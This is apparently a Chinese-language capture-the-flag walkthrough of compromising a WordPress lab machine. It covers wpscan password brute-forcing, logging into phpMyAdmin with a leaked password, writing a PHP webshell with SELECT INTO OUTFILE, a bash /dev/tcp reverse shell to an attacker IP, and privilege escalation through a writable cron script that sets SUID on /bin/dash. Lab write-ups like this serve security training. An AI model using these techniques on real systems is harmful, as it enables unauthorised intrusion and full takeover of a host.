主机探测
ip为192.168.34.94
端口扫描,只开放了一个端口
wordpress爆破获取密码
目录遍历发现wordpress,识别版本号为4.8.9
还发现文件wordpress.tar.gz
,下载下来看有无配置信息,无
寻找wordpress这个版本的漏洞,不过没啥收获
用wpscan进行扫描,有两个用户,lemon
和orange
,并且还爆破出了orange
的密码
wpscan --url http://192.168.34.94/wordpress/ -P /usr/share/wordlists/rockyou.txt
成功登录账号
信息泄露获取密码登录phpmyadmin
在草稿箱发现一篇博文
给出一串字符串,看上去很像密码,本来打算登ssh试试,结果端口没开放
n0t1n@w0rdl1st!
尝试登录phpmyadmin,成功!
phpmyadmin getshell
尝试利用日志写shell,不过权限不够无法开启general_log
general_log
指的是日志保存状态
采用select into outfile写shell
查看读写文件路径:show variables like "%secure_file_priv%"
,为空,可以写入
成功写入
`select ‘‘INTO OUTFILE ‘/var/www/html/wordpress/shell.php’
蚁剑成功连接shell
为了方便操作,将其反弹到攻击机上
echo 'bash -i >& /dev/tcp/192.168.34.21/12345 0>&1' | bash
计划任务提权
尝试借助pwnkit提权,发现这个文件都可以试试,但是此处下载exp到/tmp
失败,遂放弃,寻找其他提权方式
计划任务中发现可疑脚本
查看其内容及权限,发现我们可写,并且定时会清空/tmp
目录,这也是为何之前下载exp操作失败
赋予/bin/dash
SUID权限
|
|
成功提权
Got flag
总结
1、用好wpscan这个工具事半功倍
2、phpmyadmin getshell的方式
3、计划任务可以写入给/bin/bash
赋予SUID权限的命令,也可以写反弹shell的命令